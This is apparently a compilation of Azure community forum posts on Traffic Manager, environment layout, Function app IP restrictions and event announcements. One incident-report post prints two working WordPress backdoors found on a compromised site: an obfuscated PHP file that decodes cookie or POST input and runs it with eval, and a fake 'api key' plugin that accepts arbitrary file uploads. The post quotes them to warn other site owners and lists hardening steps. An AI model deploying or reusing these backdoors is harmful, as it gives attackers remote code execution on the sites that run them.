one Traffic manager and multiple DNS mapping (pls need clarification on how security is ensured)
Hi Team, I feel really strange on how Azure Traffic Manager allowing traffic from multiple Custom domains with just adding a CNAME record of traffic manager to them without enforcing any validation of DNS from Azure end. May be I am wrong, but let me explain in detail: Here's my setup: Traffic Manager \_____ App Gateway(East) & App Gateway(West) \_WebApp (East) & \_WebApp(West) A HA setup with applications in East & West. I've bought Domain from GoDaddy & I added CNAME record pointing to Traffic manager (pqr-tm.trafficmanager.net). I did no additional steps for Domain validation from Azure. After the DNS propogation happend, the other day when I tired my Custom Domain (lets say pqr.com), it routed to my WebApp as expected as per CNAME record. Now, when I typed http://www.prq.com in https://digwebinterface.com I could see, it resolved first to "traffic manager" (it clearly displaying my traffic manager name), then to Application Gateway DNS and then to Application Gateway Public IP. Then my friend said, I'll do a trick, I'll get into your site without my notice. Here's what he did: he has Domain in Yahoo. lets say - xyz.com he opened his Yahoo account, went to DNS settings, and in Forward URL option, he kept my traffic manager DNS name which is clearly appearing in https://digwebinterface.com by just typing my website http://www.prq.com in it. To my surprise, with in a minute, when he type xyz.com in browser, my WebApp started rending page. So, I thought where is security? Here's my point: https://digwebinterface.com -- is publicly available by typing the site name, any one can get Traffic manager URL (if the setup includes it) then, just by keeping CNAME in their forward URL, if they are able to map my site....where is the security? or Am I missed any step in Traffic manager which binds My Domain to it and If any others tries to point their domain to my traffic manager, it rejects? Pls help!! I've a strong feeling that, there will be tightening point, which I am not aware of. Pls guide Guru's :) Thanks, Kiran
Dev / Test / Prod - Subscription per environment or Resource Group per environment?
Hi, So looking back 2 years, the general idea was to create a subscription per environment to secure resources from the unintended. However, with the new RBAC model - it now looks like (for small shops) some people are recommending one subscription with a resource group per environment because you can now lock these down via roles. E.g. Some dev's cant access or even see the "Production" resource group. We are a small startup so we don't want large overheads, but we also don't want to go down some path that will box us in down the track. Does anyone have any words of wisdom? Cheers, Sam
Azure Bastion - News Comics
You are a Cloud lover? But you prefer Azure? Learning with fun? And most of all, you like establishing connections? (link removed by moderator) If you want to deep dive, do not hesitate to visit the official documentation on the Microsoft website: https://learn.microsoft.com/en-us/azure/bastion/bastion-overview (link removed by moderator)Malware Wordpress on Azure
Recently received a security alert on a wordpress webapp running on Azure: 1. There was a non-recognized authentication as admin user 2. The user Uploaded a .zip file to the plugins folder that contained 2 files: map.php and apikey.php 3. The user performed a "test" through the "plugin" Example of the code map.php: <?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?><?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?><?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}} Example of code apikey.php: <?php /** * @package api key */ /* Plugin Name: api key */ if ("hello"==$_GET["test"]) { echo "testtrue"; } if(is_uploaded_file($_FILES["filename"]["tmp_name"])) { move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]); echo "true"; } Image of the "Plugin" on the wordpress site: Sucuri sent out an alert that the .zip file was uploaded to the site. At this point there is no easy way to find the affected files on a Wordpress installation even using some tools like the sucuri scanner tool online. Recommendations: . Enable Sucuri plugin on your WP . Enable WAF v2 on your webapp . If possible isolate your resource using App Service Environment . Harden NSG(s) . Perform a SSL Test on your web app If you have any other tip recommendation please share!
Bug: Function apps IP Restrictions blocks portal UI
I noticed that if you set a IP restriction to a Azure Function app, you block the Azure Functions portal user interface at the same time. Original goal I found this bug while trying to restrict IP addresses to Logic Apps in my region (Western Europe). Error message Error: The function runtime is unable to start. Please check the runtime logs for any errors or try again later. Reproduce 1. Create a Function app 2. Goto Function Apps -> Platform features -> All settings -> Networking -> IP Restrictions 3. Add a rule, for example: IP address 40.68.222.65 (Logic Apps in Western Europe) 4. Go back to Function Apps 5. Error message appears
How to redirect from one URL to another URL adding a security token?
I would like to know, if there are any way with Azure Functions, Proxy... to redirect from one URL to another URL adding the accessToken?. I'm looking for something like this: https://myexample.azuresite.net/ -> redirect + adding security -> https://www.myexample.com/oauthCallback.html?token= Could you help me? RegardsMeetup: Deep dive into the new Azure Sentinel service!
If you are based in London or will be there on October 23, our Azure Sentinel team will co-host a free “Deep dive into the new Azure Sentinel service” meetup in the month of October. Meetup name: Deep dive into the new Azure Sentinel service Cost: Free Date: October 23rd, 2019 Time and Duration: 18:00 – 21:00 Location: The Microsoft Reactor London, 70 Wilson St. - London, UK Registration: https://lnkd.in/gvRTgpz There is a maximum capacity of 100 attendees, so if interested we suggest registering now.Executive Customer Meetings (Security) at Microsoft Ignite the Tour in Washington, DC
We are providing the opportunity for US GCC High customers to request on-site meetings with Microsoft Cloud Security General Manager, Asaf Kashi, during Microsoft Ignite the Tour in Washington, DC on Feb 6-7, 2020. Details and signup here!
